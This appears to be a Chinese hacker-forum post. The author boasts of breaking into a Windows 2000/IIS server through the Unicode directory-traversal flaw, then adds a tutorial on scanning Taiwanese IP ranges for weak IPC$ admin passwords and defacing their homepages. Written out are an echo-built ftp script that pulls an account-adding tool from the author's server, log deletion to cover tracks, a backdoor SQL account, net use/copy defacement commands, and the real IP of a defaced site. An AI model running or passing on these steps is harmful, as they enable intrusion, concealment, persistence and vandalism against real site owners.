如果说黑U漏洞的站有手气背的，大概都比不上我。
　　
　　第一章
　　找到一台破机器，看着他开了21、80、135、139、1433、3389
　　心想蛮好破的，本来没什么兴趣，先用sql客户端连接，sa空密码试试。。。。
　　居然设置了密码，这个网管的智商可能大于40，呵呵，再看看U之类的喽。。。。
　　扫描结果显示有U，3389登录上去发现没有输入法漏洞，faint，我还真不知道这service pack怎么能打出这副样子出来，照说打了之后应该没有U漏洞啊。。。。
　　随便敲个dir+c:tftp*+/s，等了半天（这机器很烂），居然没有，估计是被尼姆达搞得不行了，才出此烂招，f**!!!
　　为了快一点，dir+c:winntsystem32ftp.exe，没有！！faint!!!
　　连这个都删？？！！比我还变态。。。真没折了？那我的扫描记录留在那里多危险啊！！
　　靠，这么变态的网管，搞他没商量！！！
　　想了3秒种，得出了一个结论：
　　。。。。。。。。。。
　　其实FTP.exe是存在的～～，在哪里呢？
　　
　　第二章
　　呣呣～～，他不是爱打services pack吗？凭他这么智障的网管，肯定忘记了在service pack有一个备份，微软为我们考虑得还挺周到啊，哈哈哈哈
　　吸取教训，直接整个硬盘查找，慢就慢点吧
　　dir c:ftp.exe /s，果然在service pack下面有这个鸟文件，copy过来。。。
　　好了，echo open xxx.xxx.xxx.xxx >d 连接到我的ftp服务器（我不会告诉你的～～）
　　echo xxxxxx >>d 我的帐号，当然也不会告诉你
　　echo xxxxxx >>d 我的密码，你认为我会告诉你吗？
　　echo bin >>d 为什么？你们想想吧，反正加上不会遇到麻烦
　　echo get xxxxx >>d 方法太烂，不好意思告诉你，反正是可以用来加帐号的东西就行
　　echo bye >>d 礼貌一点，和我得FTP服务器说byebye
　　OK，
　　ftp -s:d
　　等着吧，一会儿功夫，报告cgi error，不管他，dir。。。。
　　shit !!!没有传过来，难道我的服务器....????
　　连接上我的服务器看看，一切正常啊，
　　type d ，也很正常啊，怎么回事情？
　　ping 目标,发现速度奇慢，我大概知道怎么回事情了！！！
　　改写d!!!
　　echo open xxxxx >d
　　echo asdfasdf >>d
　　echo adsfasdf >>d
　　echo user xxxxx >>d
　　echo xxxxx >>d
　　echo bin >>d
　　echo get xxxx >>d
　　echo bye >>d
　　OK
　　ftp -s:d
　　这次好了，原因不明
　　连接进去，加帐号，然后3389进去。。。。
　　
　　第三章
　　忽然说我这个帐号无权登录，faint!!! 黑个破站怎么这么烦？？！！
　　改terminal services登录帐户限制
　　在我的机器上点击“我的电脑”－》管理－》\xxx.xxx.xxx.xxx－》确定（谁会按取消啊，真是。。。）
　　等了半个世纪左右，出来了服务列表，修改terminal services“属性”，登录帐户修改为“本机上的帐户”，重新启动terminalservices 服务，退出
　　再从3389登录进去，TMD，总算看到win2000的桌面了。
　　
　　后记
　　停掉WWW服务，冲到c:winntsystem32logfiles下删w3svc日志，
　　在sql server里放个帐号，当然权限了sa一致，以后不爽了还能进来逛逛。。。。。
　　哇哈哈，不怕警察叔叔来找我喽～～！！
　　顺手改掉他那难看的index.html，放个黄色图片吧，凭那位网管的智商，大概也就看得懂这些了。。。
　　
　　总结：
　　1）如果漏洞补丁没打全，那么就不要开这个服务；
　　2）删除文件时要考虑到备份文件是否存在；
　　3）端口能少开就少开，少开一点不会死，开多了死得难看。
　　
　　附件：
　　结果参见
　　http://211.101.248.18/default.asp
　　先到iplocate411找点台湾的网站。然后把网址填到Superscan
　　
　　“查找主机”下面，点查找。得出了该网站的IP，然后把起始IP的最后那个改
　　
　　为“1”，把结束IP改为“255”（要玩就彻底点。把整个IP段都扫描了）在
　　
　　“端口列表设置”那里选上“21”“23”“80”“139”端口，要打够才行哦。
　　
　　为什么呢比如说21端口可以用FTP命令，开了23端口可以用telnet命令开了80
　　
　　端口可以知道它有HTTP服务。开了139端口可以用流光扫描IPC。明白了吗？
　　
　　找到了一台开了这几个端口的主机。开了这么多的端口的话，那么入侵的
　　
　　方法就相对多一点。先把这台主机的IP记下来。好，现在开始打开流光4。
　　
　　我要分几种情况说：
　　
　　一。这种情况在Windows 2000里才行得通，因为Windows98不支持IPC探测，
　　
　　在“辅助主机”那里的“IPC$主机”前面打勾,然后在菜单了选“探测”，
　　
　　再选“扫描POP3/FTP/NT/SQL主机”或按“CTRL+R”也可以。然后在“开
　　
　　始地址”和“结束地址”里输入刚才在Superscan里的那个IP段。在扫描
　　
　　主机类型那里选择“NT/98”，恩，开始吧。扫描出结果以后，“IPC$主
　　
　　机”，选中按“CTRL+F9”就开始探测IPC用户列表。会出现“IPC自动探测”
　　
　　的窗体，把那两个选项都选了，这样效率可以大大提高，然后点“选项”
　　
　　建议把“最多列出XX个用户”改为10个，记住。在用户名后有(admin)的才
　　
　　是我们要的，然后点“确定”出来后点“是”就开始探测了。一会儿，结果
　　
　　出来了。从现在起打比方，我们探测出了用户名为“root”的管理员，密
　　
　　码为“1234”，这就好办了，现在可以做什么呢？当然是改网页啦。要会用
　　
　　DOS的命令才可以的哦，在命令提示符里(也就是DOS状态下)，退到根目录
　　
　　直接输入“CD”回车就好，然后到重点了哟，输入:
　　
　　net use \ipipc$ "1234" /uesr:"root" 回车，等一下，就会出现“命
　　
　　令成功完成”。现在你就是那台机子的主人啦。然后输入“dir \ipc$*.*”
　　
　　如果运气好的话可以看到C:下所有内容。哟。。。看到了inetpub这个目录。
　　
　　那就再重复dir那个命令。输入“dir \ipc$inetpub*.*”如果运气还是
　　
　　好的话又可以看到wwwroot这个目录，这一般都是放主页的目录了，如果管理
　　
　　员聪明的话，也许就不在这里了，那就另当别论，再输入“dir \ipc$ine
　　
　　tpubwwwroot*.*”。就可以看到index.htm或index.asp或default.htm或
　　
　　default.asp.那么。这就是主页文件了，假如你事先做好的黑页在C:下，就
　　
　　直接输入"copy 主页文件 \ipc$inetpubwwwroot"覆盖原文件就OK了，不
　　
　　信可以在IE中输入这个IP你看看是不是你传的黑页！！（打击反华势力)